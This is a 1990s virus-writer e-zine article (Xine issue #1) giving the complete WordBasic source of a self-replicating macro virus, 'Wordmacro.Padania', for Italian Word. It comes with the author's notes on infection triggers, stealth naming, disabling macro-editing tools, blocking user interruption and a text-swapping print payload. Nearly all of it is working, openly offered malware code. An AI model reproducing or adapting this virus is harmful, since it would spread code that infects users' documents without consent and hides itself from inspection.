
                                        /-----------------------------\
                                        | Xine - issue #1 - Phile 023 |
                                        \-----------------------------/

                          ___________________
                         < Wordmacro.Padania >
                           <    b0z0/iKx   >
                            ^^^^^^^^^^^^^^^

   Well, this is a very simple macro virus written in Wordbasic. I wrote
this for fun (as all the other viriis :) ) and to give an example for the
readers of the article how macro viruses works. It will work on italian
versions of Word for Windows. Well, why italian? Just because i have never
seen a source for a macro virus in this language. 
 So now some tech specs about it:
   - Infacts this macros:
        * AutoOpen, AutoExec 	(to get power)
        * FileChiudi, ChiudiDoc (to replicate)
        * FileStampaPredef, FileStampa (to strike! ]8) ) 
        * FileExit (to cover the changes)
        * FileModelli, StrumMacro (to disable macro editing/reading)
   - Infects when the user close a file. The file will be infected when
the user will close the document using the Close action in File menu and
will also infect if a user closes the document doubleclicking on the top
left corner of the wind0ze window.
   - Disables all the tools that are used to edit/change macros.
   - Isn't interuptable like a lot of other macro viruses :) 
   - Full check if the document that we are going to infect is a .DOC or
.DOT to prevent strange changes :)
   - Funny payload :)
 This is my first virus with a payload. Infact i generally don't care to
write destructive payloads or something like. The payload will be randomly
activated sometimes when the user prints a document (with the "normal" or
with the fast print method). The probability that the payload is activated
is of 1:25 for fast prints and of 1:31 on normal prints. When activated
the routine will change all the words 'italia' in the text with 'Padania',
case doesn't matter, but only entire words will be changed. This will be
done totally trasparently: infact the routine will put a bookmark to
remember where the user was in the document, then will rewind to start,
scan and replace the words. At the end of the print (succesfully or not)
the routine will take power again, reput the old text and move again the
pointer on the text to the original location. Of course when all this will
be done also the screen updating will be disabled, so on the screen
nothing will appear :)
 Well, don't look at macro names and variables (expecially if you know
italian :) ), i just was very bored when writing in the middle of August
this virus and i just put some casual names :)
 Anyway the strange names will make the virus to be less noticeable.
Infact instead of moving as FileExit or something that may seem dangerous,
they will go around with quite funny names :) The only serious macroname
will be AutoOpen... well it can't be changed ;)

 well, here comes the source code...

............_________---------^^^^^^^^^^^^---------_________............

MacroName: AutoOpen      'this will be executed at the document opening

Sub MAIN
DisableInput 1           'disable the interruption of the execution
IsInstalled = 0	         'installation check
If ContaMacro(0) > 0 Then
  For conta = 1 To ContaMacro(0)
   If NomeMacro$(conta, 0) = "AutoOpen" Then  'search for it
		IsInstalled = 1	              'yeah, it is already here
   End If
  Next conta
End If

If IsInstalled = 0 Then	 'if not installed we will copy our macros
  CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoOpen",1
  CopiaMacro NomeFinestra$() + ":AutoOpen", "Generale:AutoExec",1	
  CopiaMacro NomeFinestra$() + ":Panza", "Generale:FileChiudi",1
  CopiaMacro NomeFinestra$() + ":BiPanza", "Generale:FileStampaPredef",1
  CopiaMacro NomeFinestra$() + ":TriPanza", "Generale:ChiudiDoc",1
  CopiaMacro NomeFinestra$() + ":Uscita", "Generale:FileEsci",1
  CopiaMacro NomeFinestra$() + ":Ranma", "Generale:FileStampa",1
  CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:StrumMacro",1
  CopiaMacro NomeFinestra$() + ":Nomacro", "Generale:FileModelli",1
EndIf
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: BiPanza      'this will go instead of the FileStampaPredef
                        'FileStampaPredef is the english fast print button
Sub MAIN
DisableInput 1
ScreenUpdating 0        'dont update the screen
xepmi= Int(Rnd() * (25 - 1) + 1)   'put a random value in xepmi between
                                   '1 and 25
if xepmi=15 then         'if 15 then our payload will be activated	
 ModificaSegnalibro .Nome = "Trux", .Aggiungi 'this put the bookmark
 InizioDocumento                              'go at the start
 ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania", 
    .SoloParoleIntere = 1, .SostituisciTutto On Error Goto Tardi
End If	                'complete our mission
 FileStampaPredef       'print the document
Tardi:
If xepmi=15 then        'reput the old words
  ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia", 
  .SoloParoleIntere = 1, .SostituisciTutto      'reput old stuff
  If SegnalibroEsistente("Trux") = - 1 Then     'it the bookmark exist
    ModificaSegnalibro .Nome = "Trux", .VaiA    'go to it and then delete
    ModificaSegnalibro .Nome = "Trux", .Elimina 'it
  End If
End If
ScreenUpdating 1                                'reenable screen update
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: Nomacro      'this will be put to prevent macro reading or
                        'editing
Sub MAIN
DisableInput 1
'hehe, just here to bypass the macro selection
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: Panza        'this will go instead of the FileChiudi
                        'FileChiudi is the english FileClose
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$()              'get current name
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
		Infetta = 1             'check if it is a DOC or DOT
End If
' if it is a DOC or DOT and it isn't a macro window we will infect it
If ((IsMacro(0) = 0) And (Infetta = 1)) Then	
  ScreenUpdating 0
  CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
  CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
  CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
  CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
  CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
  CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
  CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
  FileSalvaConNome .Formato = 1
End If
On error Goto gusarji
FileChiudi                             'close it!
gusarji:
ScreenUpdating 1
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: Ranma       'will go instead of FileStampa which is FilePrint

Sub MAIN
DisableInput 1
Dim dlg As FileStampa
On Error Goto Dopo
GetCurValues dlg
Dialog dlg
ScreenUpdating 0
xepmit= Int(Rnd() * (31 - 1) + 1)   'put a random value in xepmi between
                                    '1 and 31
if xepmit=15 then        'if 15 then our payload will be activated	
  ModificaSegnalibro .Nome = "Trucciolo", .Aggiungi
  InizioDocumento
  ModificaSostituisci .Trova = "italia", .Sostituisci = "Padania", 
  .SoloParoleIntere = 1, .SostituisciTutto
End If
FileStampa dlg
if xepmit=15 then
  ModificaSostituisci .Trova = "Padania", .Sostituisci = "italia", 
  .SoloParoleIntere = 1, .SostituisciTutto
  If SegnalibroEsistente("Trucciolo") = - 1 Then
    ModificaSegnalibro .Nome = "Trucciolo", .VaiA
    ModificaSegnalibro .Nome = "Trucciolo", .Elimina
  End If
End If
Dopo:
ScreenUpdating 1
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: TriPanza     'this will be set as the ChiudiDoc macro that
                        'is executed when the user closes a Document
                        'window doubleclicking the top-left button
Sub MAIN
DisableInput 1
infetta = 0
puzzone$ = NomeFinestra$()           'get name of the file
Our$ = Mid$(puzzone$, Len(puzzone$) - 3)
If ((Our$ = ".DOC") Or (Our$ = ".DOT")) Then
		Infetta = 1             'be sure that it is an infectable
End If                                  'item
If ((IsMacro(0) = 0) And (Infetta = 1)) Then
   ScreenUpdating 0
  CopiaMacro "Generale:AutoOpen", NomeFinestra$() + ":AutoOpen",1
  CopiaMacro "Generale:FileChiudi", NomeFinestra$() + ":Panza",1
  CopiaMacro "Generale:FileStampaPredef", NomeFinestra$() + ":BiPanza",1
  CopiaMacro "Generale:ChiudiDoc", NomeFinestra$() + ":TriPanza",1
  CopiaMacro "Generale:FileEsci", NomeFinestra$() + ":Uscita",1
  CopiaMacro "Generale:FileStampa", NomeFinestra$() + ":Ranma",1
  CopiaMacro "Generale:StrumMacro", NomeFinestra$() + ":Nomacro",1
  FileSalvaConNome .Formato = 1
End If
ChiudiDoc                               'call the old function
ScreenUpdating 1                        'reenable updating
End Sub

............_________---------^^^^^^^^^^^^---------_________............

MacroName: Uscita     'will go instead of the FileEsci which is FileExit

Sub MAIN
DisableInput 1
StrumOpzioniSalva .SalvataggioNormalDot = 0 'enable fast save of normal.dot
StrumOpzioniSalva .SalvaVeloce = 1     'enable fast save for all the docs
FileEsci	'exit the file
End Sub

............_________---------^^^^^^^^^^^^---------_________............